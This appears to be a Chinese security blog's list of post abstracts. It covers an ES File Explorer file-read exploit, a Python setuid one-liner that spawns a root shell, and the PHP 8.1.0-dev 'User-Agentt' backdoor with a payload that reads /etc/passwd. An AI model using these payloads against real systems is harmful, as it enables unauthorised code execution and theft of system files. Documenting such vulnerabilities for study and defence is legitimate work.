摘要:
ES文件浏览器是一款安卓系统常用的文件管理器,有文件管理、HTTP服务等多种功能 在v4.1.9.7.4版本下有个任意文件读取漏洞 exp: # Exploit Title: ES File Explorer 4.1.9.7.4 - Arbitrary File Read # Date: 29/06 阅读全文
摘要:
python3 -c 'import os; os.setuid(0); os.system("/bin/sh")' 阅读全文
摘要:
PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通过发送User-Agentt头来执行任意代码。 添加请求头 User-Agentt: zerodiumsystem("cat /etc/passwd"); 阅读全文